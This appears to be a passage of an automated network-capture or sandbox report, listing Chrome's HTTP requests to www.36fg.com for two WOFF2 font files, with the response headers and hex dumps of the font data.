                                                        2025-03-15 00:17:58 UTC946INData Raw: ee 6d 13 f7 91 30 1f fc 94 7f 5a 82 43 75 13 a7 29 a9 ca 54 b0 ec 13 23 84 ef d9 17 f8 2b 92 4b 48 56 cb d6 eb b9 64 7b 2d ed 2c 4b da 6b 33 55 96 35 cb 92 85 3e 05 af 3e dc 4f b2 e2 9c 62 3d 99 80 d6 4c 5c 02 fe a9 b1 e6 09 be 4e fd da c0 a3 e0 24 78 b9 97 15 13 3d 93 21 78 9a c7 d9 93 55 3d ca e0 99 74 5b d6 56 e1 52 b6 96 b2 1c 2b 85 64 b5 5e f2 4b c2 7d 0c 09 56 9b f1 08 a3 be 06 6f 07 ff 16 ae 9d 05 be 01 b6 81 c7 d9 b2 b7 80 5f fa 0d aa 9d 5f aa 93 9f d4 82 83 7b 05 a5 b6 87 5d 19 a4 65 5e 08 67 12 97 25 3c c8 ba ef a9 ca cf 07 90 e7 75 6f b4 24 3f a0 b9 46 27 36 f7 70 38 f5 05 f8 b2 df 2f d6 cc ca a5 0f df 1b 45 79 21 26 34 13 32 51 50 4d 59 7e e2 76 15 e3 9a ee a5 90 1f f3 3c c7 c2 5b 84 6b f4 de d3 36 4e 86 f8 46 33 df 78 a1 9a 93 13 60 62 6a 2d
                                                        Data Ascii: m0ZCu)T#+KHVd{-,Kk3U5>>Ob=L\N$x=!xU=t[VR+d^K}Vo__{]e^g%<uo$?F'6p8/Ey!&42QPMY~v<[k6NF3x`bj-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.549781104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC679OUTGET /static/fonts/pxibyp8kv8jhgfvrlcz7z1xlfq.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC399INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 7832
                                                        Connection: close
                                                        Server: cloudflare
                                                        Accept-Ranges: bytes
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        Etag: "60e7ae7a-1e98"
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        Cf-Cache-Status: REVALIDATED
                                                        CF-RAY: 9207d4b4ea4b2395-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:58 UTC970INData Raw: 77 4f 46 32 00 01 00 00 00 00 1e 98 00 0c 00 00 00 00 3e 50 00 00 1e 46 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 20 1c 30 06 60 00 81 54 0a e5 14 cf 2e 0b 83 36 00 01 36 02 24 03 86 68 04 20 05 83 44 07 84 0b 1b e2 30 33 03 31 c6 01 0c 33 6e ab 28 aa 14 65 f6 5f 26 68 47 98 fc 2e 46 58 b0 88 1a 45 71 08 33 51 4c b2 53 47 b8 7f 3b f7 d9 f4 43 e3 80 42 93 4a 7b f6 f5 f1 6a 2b 6e 84 34 26 96 27 6a 3f d0 b7 7b 3f 8c 8a 4a 20 0c 30 a8 b8 82 ac 42 d9 a9 65 1d b0 65 90 75 44 42 11 ba 4e 6e 78 7e 9b 3d c4 5e 94 36 6d 80 44 09 08 8a 88 92 8a a8 54 59 a8 60 62 16 56 dd 5c eb ad 8c b9 f8 3b 57 37 17 37 5d e4 55 6d 57 8b ab 5e 5f aa 3f fa 97 2f 6b b2 96 44 30 4f 85 c6 83 59 e8 e7 52 b4 c0 ff 3d c0 00 f0 ff d3 f5 fa 46 da 35 dc 3b e3
                                                        Data Ascii: wOF2>PF 0`T.66$h D0313n(e_&hG.FXEq3QLSG;CBJ{j+n4&'j?{?J 0BeeuDBNnx~=^6mDTY`bV\;W77]UmW^_?/kD0OYR=F5;
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 3b 9e f3 05 22 53 7b ca fd 06 1c 86 5c 82 bb cd be bc 11 6a 5b bf bb b9 a9 3d 9b d8 17 d6 d8 a1 d3 a8 43 fd 49 fa 1d d4 ff a9 e6 5f a8 d3 9f 6a b6 5f 26 70 6a f8 0f fa e3 8a fd af f1 43 4b 67 53 b0 77 08 d6 87 d9 9d a7 dd 0c 81 42 bc 3e 61 48 90 f7 86 90 b6 47 9b ce 13 0f 57 d0 6a aa fc f4 ee df 4a 15 ca 8c 30 1e aa 06 95 cd 4d 1c b7 49 80 89 70 ae a4 46 b4 3a 0e 92 a6 29 f9 e4 1d c4 dd 39 ef 4d 91 2e 81 9a 37 0c 15 d9 bb d0 13 8b 36 21 a8 f5 8c 28 10 a8 dc b2 d2 f2 f4 15 20 60 3e 8d 77 c6 48 97 b1 34 dd 30 5d 87 d8 7c 2f 30 4f a3 cf 77 44 7a c6 1a c8 5a 8a e9 87 d4 bd 2b 89 9a 2f 5c 2e 43 a1 95 d9 5d 23 c8 62 73 fd 10 70 8d 1d 0e 6d 37 41 1d d3 c7 26 54 d3 74 be 42 4f 34 11 bb 20 7a b0 81 c9 5a 52 6a b5 0f b4 ae 92 45 ea f2 97 ec 82 ce 22 7c 0f 3a b5 f0
                                                        Data Ascii: ;"S{\j[=CI_j_&pjCKgSwB>aHGWjJ0MIpF:)9M.76!( `>wH40]|/0OwDzZ+/\.C]#bspm7A&TtBO4 zZRjE"|:
                                                        2025-03-15 00:17:58 UTC1369INData Raw: b0 e2 28 9b f7 45 e7 52 53 7a a2 da b2 2a 14 fe b2 dd e8 e4 ff 10 7a ba 95 77 cc 52 b7 fc 7e 2a 3f 14 94 ec 00 73 e6 5c 4e f6 ef 68 13 30 db f1 cb a6 51 30 ef 27 9d af fb 51 dd 4f 6b 25 53 f7 f7 3c a6 b7 e6 ca 9b 65 91 ba 5e 16 27 47 ce 82 09 c2 0b 7c 29 29 ad ac 2f 42 d6 d9 10 f8 c2 0b 4a f8 5c d2 ab 0d 28 2d 94 44 eb 70 28 de 86 9a da 77 9b 5d 1a 43 14 dc e2 68 35 99 f8 ac 24 85 b1 3a 04 5c 1f c1 db c9 55 10 d3 85 f5 a2 d5 3b a8 f2 dc 98 67 06 b5 47 57 6e 93 9c 05 43 7b 65 39 b2 e1 4f 13 40 dd dd f2 60 fc 59 15 e3 41 0f 9e d0 4b 21 f7 12 f0 3d 64 b0 46 83 59 fb 55 cd c0 14 57 6e e0 ad b3 e1 5d 8d 93 13 98 3d 07 c1 e6 40 db 31 59 9a c6 27 4f a1 b7 1f 24 36 47 16 b6 4e f2 e7 ea 8f e3 1c c8 da c1 b5 56 c4 2b 3c 54 42 75 b1 af bb 0c 6e 5b b0 d0 f7 2b b7 58
                                                        Data Ascii: (ERSz*zwR~*?s\Nh0Q0'QOk%S<e^'G|))/BJ\(-Dp(w]Ch5$:\U;gGWnC{e9O@`YAK!=dFYUWn]=@1Y'O$6GNV+<TBun[+X
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 5a 5d 41 79 b6 fe 48 eb 80 76 7f 5c 41 4d a2 be e4 7f 68 29 50 5b c3 e3 15 a6 dc 37 2c 13 89 cb 0c db 49 1b 60 34 98 1a 1b a2 ed 92 ac 66 f9 0e 21 7d e2 3c bd 25 14 eb b4 ca 4c 60 76 dc 37 c6 0f 83 d0 9a da b7 a2 40 20 cd 28 4f 0f 9a 0a 6c 71 97 d0 7e 27 12 7e a7 95 80 3f bc 9b 18 f2 3c 98 78 81 f3 59 54 f4 69 74 18 36 ea 77 51 80 2e 26 51 95 92 3f 5a 51 5d 2b 1f 11 cf fc 0b 9b ee 46 a2 b3 d0 b8 17 a2 40 51 90 36 26 31 33 89 cf cf ab e1 65 02 ce e2 e0 45 36 c4 be 38 08 be 5f 9c 4d 4a 14 f1 f9 49 a2 a4 59 68 26 3b d3 dd 97 ac d1 74 09 15 5d d9 33 e0 83 c5 bf 17 ef 9a b7 70 e1 b5 4d f3 9b 80 30 65 69 61 f1 7d d7 bb 35 ef be 7f 6a f1 5c c1 4a eb ca a5 86 95 c2 15 f0 db d8 dd b6 bb d7 1e 15 7c 6f bc 3d f2 71 cb c7 d7 1e e4 fd 68 01 bb 17 9f 7e fa 13 f4 93 af
                                                        Data Ascii: Z]AyHv\AMh)P[7,I`4f!}<%L`v7@ (Olq~'~?<xYTit6wQ.&Q?ZQ]+F@Q6&13eE68_MJIYh&;t]3pM0eia}5j\J|o=qh~
                                                        2025-03-15 00:17:58 UTC1369INData Raw: a9 d2 01 ab 45 3a d8 9d 66 32 01 ab 6a b1 6e 71 6d 35 09 94 05 1c 6e a1 58 cc 98 df 23 61 66 95 69 43 ea 76 c0 8c da cd e1 ec 8e 0a 8d 29 da be 41 51 69 c8 02 21 72 92 4a 41 a2 66 74 92 dd b9 6e 62 85 92 9e 4e 22 a9 e2 7a a2 2e 60 30 17 a3 52 03 74 36 68 e6 d3 a0 fd fa f9 b9 a2 43 35 60 e7 05 6f a8 e7 52 17 48 ba 93 cf e1 e4 25 09 38 f9 ac 26 25 bd 66 8a cb 17 24 c5 e5 5d a7 ac 41 67 90 cb 5f 3e 3a b9 a7 33 83 99 2a 35 3e d5 3b 4d fe 89 2b 62 27 ba 76 0b 62 e3 86 f5 1b 11 60 e2 e7 fa ad f5 20 c4 5e 95 6b b3 55 e6 6a 34 95 f9 d6 44 1b 99 a5 8a 0b 89 59 44 a1 17 49 a4 77 d0 a8 e3 24 30 5c 90 33 bf 7b 65 f7 bc 9f b8 67 be 6e ba 6e b7 07 af 5d 9f 2f 60 e7 36 a5 56 47 ad 7b b0 26 3c a2 33 c6 2c 51 ca 15 c9 94 48 dd 0a 08 ea d6 48 d4 12 6d 3c 15 cd 7e 09 4f dd
                                                        Data Ascii: E:f2jnqm5nX#afiCv)AQi!rJAftnbN"z.`0Rt6hC5`oRH%8&%f$]Ag_>:3*5>;M+b'vb` ^kUj4DYDIw$0\3{egnn]/`6VG{&<3,QHHm<~O
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 19 0a ad e7 df 52 3a a4 84 c9 4b e6 8b ac 0b ad e7 df 9a 7f 0e 29 99 5f 29 0c ad bc 90 97 79 6e 51 e0 10 5a cf bf e5 3b fe 1d 97 86 94 f8 c8 cb e5 8b 7c 11 5a af dc 12 f1 73 bd 47 15 3e 97 f7 4d 4e dc 7e 10 f9 00 20 a1 f5 fc 5b 4e f3 ef 18 e2 97 38 30 e4 b6 4f 14 b9 56 cb e6 79 82 d0 fa 11 b7 bc 22 ad 84 fc c8 17 77 6d 46 89 f6 82 fd d5 f3 dc fa bf 4f c9 4f 8a 4a 17 ef 5e 45 dd 9d f7 a6 5f 2d 52 04 94 c3 00 50 74 e7 b1 ca 21 25 76 28 46 1c d0 db 62 14 5a cf bf e5 b5 21 25 26 bd 56 7e bd b3 81 12 3d 81 7a 67 d5 41 9b 3c ce 7a e7 6b 54 92 72 9b 97 79 62 25 78 cc 0e e1 f9 49 0f 0f bc bc 28 31 c0 5c 00 58 09 c9 6f 99 43 98 7f ef 59 53 31 67 07 6c 63 93 ab be 2d a6 07 96 b3 c7 46 a0 5f 8c 0f 32 3f e4 ef f6 8f 1f be 2f 09 80 fc 3a 3e f0 43 81 71 c1 74 35 22 d0
                                                        Data Ascii: R:K)_)ynQZ;|ZsG>MN~ [N80OVy"wmFOOJ^E_-RPt!%v(FbZ!%&V~=zgA<zkTryb%xI(1\XoCYS1glc-F_2?/:>Cqt5"
                                                        2025-03-15 00:17:58 UTC17INData Raw: be 29 6c 9d 99 22 f2 fc 9f bd f0 4d 67 32 19 6c 00
                                                        Data Ascii: )l"Mg2l


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.549780104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:58 UTC659OUTGET /static/fonts/fontawesome-webfont.woff2 HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://www.36fg.com/static/css/fontawesome-all.min.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:58 UTC936INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:58 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 77160
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        etag: "60e7ae74-12d68"
                                                        strict-transport-security: max-age=31536000
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fzy1ThvP5URykwEQFANwxHlqn%2FwbkMzY3618vRDwc%2BPsUu6dzhi1zOhmU8RV7S5qdaUybzJQvQlY7OUPkKHuJuQ77ZkurOOVkVKgmq6q65xzrsl954Ja5M0qsODejcg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4b4fa8b4267-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1707&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1231&delivery_rate=1623123&cwnd=219&unsent_bytes=0&cid=612dc83cb99c7db1&ts=354&x=0"
                                                        2025-03-15 00:17:58 UTC433INData Raw: 77 4f 46 32 00 01 00 00 00 01 2d 68 00 0d 00 00 00 02 86 98 00 01 2d 0e 00 04 01 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 20 06 60 00 85 72 11 08 0a 89 99 28 87 b6 58 01 36 02 24 03 95 70 0b 96 10 00 04 20 05 89 06 07 b4 75 5b 52 09 72 47 61 f7 91 84 2a ba 0d 81 27 ed 3d eb 3a b5 1a 26 d3 cd 3d 72 b7 2a 0a 02 19 e5 1a f1 f6 5d 04 74 07 dc 45 aa 6e a3 b2 ff ff ff ff e4 a4 31 46 db 0e dc 40 e0 d5 f4 fb 7c ad 8a 14 08 66 93 6d 92 60 9b 24 d8 91 a1 40 64 5b 42 51 11 24 28 5b 55 3c 2b 28 ad b8 40 50 d0 35 1e e4 60 81 b0 0e da 3e f6 50 10 1a 3b e1 28 91 d1 31 b3 fd 6c db fe 68 d4 a8 a2 c2 29 9f dc 59 79 94 f2 4a 69 e9 eb 17 ad 85 ce 7c 25 db 81 b7 5e ac 14 47 82 a2 33 b8 12 6e 9e 95 e8 ba da 95 dc 0a c4 cd 90 44 8a 9e
                                                        Data Ascii: wOF2-h-?FFTM `r(X6$p u[RrGa*'=:&=r*]tEn1F@|fm`$@d[BQ$([U<+(@P5`>P;(1lh)YyJi|%^G3nD
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 24 2c 30 41 54 50 54 b4 31 12 03 fb f4 ac 3c 0b ed 3b ed f3 d2 60 10 e6 b6 27 f1 48 0e 3f f1 73 ce a9 3a 91 0f 4e 44 9f a8 fc a9 10 49 11 a4 24 8c 04 54 14 8b 5b 81 82 62 34 8a 11 cd fc 7f ea ec ef 2c af ce bc d7 ef bd a3 62 6c 36 91 ba 0b 49 4c e9 69 7d db 8c 26 e0 34 e3 94 6d 2c 27 cb 16 cb f3 23 bd d7 a5 b3 7f 52 77 01 a2 62 75 c0 b6 2c 4b 96 0b c6 06 9b e2 76 8b 03 db 08 6d 5f 2d c0 c0 e6 5c 48 8b 9d fb 8e 48 48 fe aa f3 93 ea 07 c6 c2 3f 98 96 d3 6d f3 0b 39 50 88 ad d8 29 39 e7 4a a8 86 24 c6 bd 88 9c e7 b1 f4 38 f8 e8 c7 da ce ce 7e b9 3b c4 72 15 8d 6e bf 3d 24 11 1a b5 1f 94 4e 64 64 6e 1b 21 27 ae a6 f0 e3 3b b3 f4 ac 38 99 bc 27 d9 4e a6 ed 1e 21 7f 2d 18 06 4a 19 ca b6 d3 2e e0 d8 fa 91 ee 58 af 3d 0c 2c 12 04 0e 90 9b 1e 22 60 3a 18 a2 ff 1b
                                                        Data Ascii: $,0ATPT1<;`'H?s:NDI$T[b4,bl6ILi}&4m,'#Rwbu,Kvm_-\HHH?m9P)9J$8~;rn=$Nddn!';8'N!-J.X=,"`:
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 69 a8 22 8a d9 5c b3 68 04 37 49 8c f6 a0 3c 53 43 4f 02 ad 19 b8 96 c8 90 48 a0 1e e2 45 77 21 01 2e 1f d7 e9 fd 21 42 53 12 43 aa 67 1e c4 9d 89 63 e3 0e b9 e4 73 2a d5 a7 73 89 28 35 6d 94 3d 71 c6 ca 8a 65 a2 fb f1 59 91 0b 24 eb 5c 3e 10 66 4e 38 80 71 97 8c 78 ea 23 76 0a a5 36 75 6d ef 09 e0 19 9d b0 60 db 4e 4d 2d 4a 00 5c f4 10 46 b7 c7 72 e9 44 02 80 1e b5 5a d3 30 93 07 23 27 ea a5 88 6e ec 11 d2 47 6a 4c 82 da 86 58 14 1b ca 8c a2 41 aa 9d f1 67 59 73 99 2a b2 59 ca dc 07 c7 5e d9 b5 98 3b 22 d8 1d 24 68 62 7f 3d b9 16 19 cf 9b 13 98 30 de 76 48 3c 97 56 76 7f 81 63 9b 5f 00 5c 59 8a 03 ec a3 e8 77 3b 64 42 16 02 83 8b 03 4e 83 84 33 1b 21 24 ce e7 e7 b4 e7 e2 de 49 7c 50 98 20 7e 13 26 13 e4 03 64 c5 2e c8 03 1b d4 b0 e9 02 2d 61 07 f3 fa 61
                                                        Data Ascii: i"\h7I<SCOHEw!.!BSCgcs*s(5m=qeY$\>fN8qx#v6um`NM-J\FrDZ0#'nGjLXAgYs*Y^;"$hb=0vH<Vvc_\Yw;dBN3!$I|P ~&d.-aa
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 19 0a e7 0d 1c 36 2d 60 2f 22 48 0b 0a 6f 85 26 92 44 97 49 30 ff 45 32 58 61 89 95 2d 1f a9 7b 0e 35 c0 81 99 3c 0d 2c 7d 94 d1 13 60 60 36 fa c7 ed 18 90 6a 69 a2 e9 d8 69 6d 3c 55 75 6a 59 a9 5a fa 6a 0e 42 5c 40 8c 67 cb 33 45 6a 66 70 96 f8 98 9f 3a ba da ed ea 10 57 db c7 ae 9f ba d9 df b3 8e 9c 94 ce 70 a5 c4 b3 33 61 6f af fb 11 81 31 88 64 61 8b f8 20 9c 03 b7 dd ab a5 fd 88 99 4a 82 d7 b2 3f 20 6a ce 71 37 ae be 4d c3 e6 ce 66 66 99 59 b5 66 cb 1c d4 73 02 1e b0 1b 24 9b 9c 09 84 95 48 fd 91 14 e6 ac 6c a5 96 f5 b9 bf c0 88 97 28 25 2e 9b 72 06 e3 d2 77 3f 03 f2 be 6d 3d 7e 0b 82 79 b2 63 59 91 62 67 29 3c cb 57 84 20 2f 56 78 16 da 6b a9 b4 92 24 e7 f3 8f 0c 42 f0 72 7e f1 86 01 a7 d3 f0 39 13 de 36 8d 30 d1 26 fe 99 5f 76 4d 00 59 c2 25 84 93
                                                        Data Ascii: 6-`/"Ho&DI0E2Xa-{5<,}``6jiim<UujYZjB\@g3Ejfp:Wp3ao1da J? jq7MffYfs$Hl(%.rw?m=~ycYbg)<W /Vxk$Br~960&_vMY%
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 58 5d 8e 45 98 32 1e 39 90 87 64 a6 6b 59 fd 0d d9 6a 90 8e c2 52 36 d1 d4 ed f7 03 51 12 21 98 ca 00 ea ee f7 20 56 86 bb 99 0a 25 22 08 15 5e d0 60 97 4e 33 4f f2 8c a2 0f fa 86 83 ac 5b f1 1d 76 3a e0 ca 84 3a d9 e8 5e da 9c 72 d7 bf e7 11 40 ea d2 ec 0a 8d 46 c5 5f ae d7 11 e5 01 08 4e 63 cc 42 d2 17 f1 fd c3 38 70 a3 5c 69 af a2 b5 d7 37 cf ee 8b 67 e5 ad 03 2a ee 8f d1 cd fd 2c 83 43 ab 9d 1a c2 0e e1 5b 87 36 b4 54 92 3f ba ba b5 16 85 25 f2 7a fb c5 40 01 06 18 6a 41 70 42 4e 35 f0 9e 22 34 54 9e a5 e0 f4 22 96 7d 30 75 4a f4 87 8f 9e 96 c8 9c 7e 33 f6 1e d9 0e d1 7b 7d 02 75 57 f6 8c e0 ee 4d 93 1e 6a fa 39 c8 2d 82 5d 13 f5 ab 9d 11 99 27 6c 53 b2 20 2f f0 52 3e 3c a5 2b e7 4f 9f 95 db d8 1f 65 42 23 95 42 63 d2 1a d9 c0 02 e8 6a 4c 5c 11 12 a3
                                                        Data Ascii: X]E29dkYjR6Q! V%"^`N3O[v::^r@F_NcB8p\i7g*,C[6T?%z@jApBN5"4T"}0uJ~3{}uWMj9-]'lS /R><+OeB#BcjL\
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 88 e0 01 ea 83 60 4d 7c f6 d4 99 9a 64 4f 86 d9 a5 69 5a ae e3 19 c5 24 ae ee 19 bb 2b 23 1e 4b 48 c8 46 0a 8d c3 e9 c4 ea ed be 83 00 a7 8e 09 ee c8 18 f8 89 1f a7 8f 29 2d 09 be 06 3a 4d 24 cb 79 63 a0 ae 45 c0 25 41 69 95 92 05 32 5d 96 98 08 cc 6c e5 b6 a8 90 89 1c 9a 19 cd 38 86 49 1a bc 79 b2 d2 05 5a 17 47 4a b3 83 1a a2 06 ae 5c d5 1e 32 1a d6 99 58 62 18 bf 4c be f6 f0 9f 49 c2 41 2d fd 47 72 52 00 21 cd 30 a0 13 a0 db 4c 2b c0 51 68 aa 53 f3 59 d4 d2 13 d7 f2 53 bf 35 fd 5f 1e d8 28 a5 06 0e 70 6f 46 9a a7 54 89 87 11 af 23 6b 1c 4e db be ea 6c 7c 72 87 6e 06 b3 64 d7 48 a0 07 1e 96 dc 79 13 db 8a e6 f9 ee e4 c8 26 db 86 17 78 e3 70 b0 c1 f7 e1 e5 5b e9 16 38 47 1a 86 fe d9 64 74 ac a2 ac a3 b1 7a ec b0 83 d9 a6 06 09 38 b4 b4 42 bd ae 4b 50 22
                                                        Data Ascii: `M|dOiZ$+#KHF)-:M$ycE%Ai2]l8IyZGJ\2XbLIA-GrR!0L+QhSYS5_(poFT#kNl|rndHy&xp[8Gdtz8BKP"
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 33 c5 73 16 8f b5 50 2d d0 62 44 a0 d4 fc 22 8d 0f ec 5b 3a b0 77 c9 ba 5e 6a f9 89 d3 81 bb d0 51 65 6a 60 8c 8b 97 54 71 92 05 3d a2 fa b1 94 48 26 a3 6f 8f 1b a1 1b 6b c4 89 4c 44 de 57 a1 4f fb 86 c2 f9 94 eb ca 2a 4a 33 73 5b 19 ce 36 9d 6a 31 f0 40 d9 d8 6e 72 3c ae ce be db 87 86 23 89 cd d2 40 09 88 30 bf 9b 63 06 09 a2 9d 1f 05 99 3f ef b5 9d 3c 32 8a 44 d5 d3 a6 09 bf e8 7d af b0 54 73 cd d9 53 ce fd d0 22 e2 0b 52 cd 0a ae 95 a4 2e 7d df 6f 5a de cd 18 e3 87 f9 46 6f 2a 98 95 a7 dd 97 87 b6 ff b7 96 b5 3a dd f4 d6 1b c1 93 bc c1 37 c9 ed f7 48 c2 f2 e4 8d 9a 0e a5 78 a1 b4 5d c5 db c7 61 19 36 1e 76 35 ed 12 52 fd a0 cc be 65 31 87 ed 24 58 4c 85 9b ba c3 0a 4a 89 61 61 9a 11 13 dd 86 2c c6 f3 ec 84 90 cc 1a 22 33 2d cf 47 e4 21 1c cb a5 38 b3
                                                        Data Ascii: 3sP-bD"[:w^jQej`Tq=H&okLDWO*J3s[6j1@nr<#@0c?<2D}TsS"R.}oZFo*:7Hx]a6v5Re1$XLJaa,"3-G!8
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 89 5c 8e c0 8a a1 f2 4a b5 41 ca cd 3b a4 f2 51 3b 1c 95 5d 85 89 fd 49 b4 4d 38 09 d9 73 af 02 aa d8 14 4d 66 f4 3f d4 b0 07 1c a1 49 12 18 9a b2 72 1b bb 72 21 d2 4b 86 39 d1 8f 38 70 d9 7d 51 bf ec bd 8d 8b e7 67 fb 2d 84 2a 0f 73 6d b5 7e c5 58 06 d7 50 1a 30 64 f8 4d 5e 08 b5 f0 3f 44 c5 18 64 49 82 6d 3c 86 a8 70 3b a1 7f 06 79 8e 06 2c 22 db a6 a6 36 ad e4 76 ca 70 07 54 5c 5e ca 6e f4 db f7 be 7f 05 33 6d a4 3e 38 a4 65 43 ae f1 dc 4e 7d 10 ad cd ea ed 63 c3 a0 e6 d9 ad 24 73 37 db bc 13 fa 9c 23 d5 b5 3c 53 46 2d 41 ba a7 a0 14 e4 86 f9 7a ac d2 e2 89 b1 13 cf 0a 80 42 81 09 2a 7b b8 06 36 63 67 1d 89 87 b1 54 7a ad 47 07 58 1f 32 2b 93 82 cd f6 d9 19 ff 61 07 b6 9c 30 9b 01 1b 86 a4 ff 07 3b e6 1c 20 9d 45 45 61 47 98 64 f1 ce 98 00 06 d7 bf c0
                                                        Data Ascii: \JA;Q;]IM8sMf?Irr!K98p}Qg-*sm~XP0dM^?DdIm<p;y,"6vpT\^n3m>8eCN}c$s7#<SF-AzB*{6cgTzGX2+a0; EEaGd
                                                        2025-03-15 00:17:58 UTC1369INData Raw: cc 6c f1 82 29 f2 24 18 4d 72 89 f5 c0 9a 7c 5e ba 04 91 09 61 99 bb e2 b7 10 03 fe a7 3a 88 a0 cd 22 e9 d6 8a 9d db 61 09 c2 6c 02 f2 3e 1b de 68 00 c7 e1 79 a2 7f 80 14 61 d1 ce 7b 9e 32 3e af fe 43 50 ae 89 90 b0 4c c5 0f 10 20 9a 6a 3f d1 6e 08 74 67 e5 9e d8 d3 5d 03 a6 16 e1 53 88 b8 f8 f8 7b e1 b5 55 d3 87 05 91 28 27 b3 b5 62 e7 a3 27 66 8f e6 67 30 d3 83 dd ea 18 95 c4 4c 50 41 a5 4d 74 64 15 07 cc 29 e3 b3 32 c3 ba e3 59 21 d6 76 00 8e 26 60 6f 85 af fe 32 12 50 5b 0b 1b 9d 61 de 94 84 bb 35 fb c0 0c 53 87 7c 23 2b 80 b2 01 37 4a 05 a4 8a 0a 23 1b c8 b8 cc 5f ab d5 64 55 a9 a4 36 23 56 19 44 ae 86 c0 9b 42 22 4b 83 f7 d6 7c a2 1a b8 c0 c1 19 16 80 29 02 6f 90 d0 10 aa 74 6b fd 6c 03 9a e6 c8 2c ae 14 fb 6c 11 e8 a1 eb 0f f3 55 1f ec 29 dd b9 65
                                                        Data Ascii: l)$Mr|^a:"al>hya{2>CPL j?ntg]S{U('b'fg0LPAMtd)2Y!v&`o2P[a5S|#+7J#_dU6#VDB"K|)otkl,lU)e
                                                        2025-03-15 00:17:58 UTC1369INData Raw: 49 ab 00 ed af 9e c1 1d 67 5a be 08 32 cf 76 1a 6c 66 2c df 10 d0 a3 a2 ce 7f 59 bf f3 87 d1 ae ec dd 62 d4 a9 ea 1c f9 9e 19 d9 58 6f c3 49 12 c4 97 cb 9c dd 58 a8 81 a2 0e 5f 27 01 c4 12 f2 c3 35 f5 c7 15 5d 1a 4a 84 b8 fc 32 50 d2 08 39 32 b0 a8 43 cd 89 fa d4 ff 0c fd 40 f1 99 a6 43 a5 a0 86 f9 9b 18 36 14 45 9f 65 d1 00 42 40 8b 0b 06 e8 ac df 41 91 39 94 df 87 c3 02 e7 e6 c7 b4 e8 79 06 5d 00 f5 05 48 f1 09 07 89 03 2d 1c e0 20 db 62 b6 a8 39 0d d1 f0 4f 1e f5 19 30 0c 75 77 a7 ac 49 e2 c8 f1 a6 02 37 4a a6 78 95 c5 ab 32 af f3 5c ca 19 56 66 3d 6e 56 91 56 80 ab a4 d0 22 23 39 93 ac d6 76 38 78 0a fb b6 6d 15 0f 14 70 41 68 f6 d3 13 e8 79 e2 91 33 82 bb 70 51 09 0e 25 e4 d0 74 5e af 91 d8 20 7c 83 c2 82 5d 9d 59 42 38 6a 43 d7 ac 6e c4 23 07 26 cb
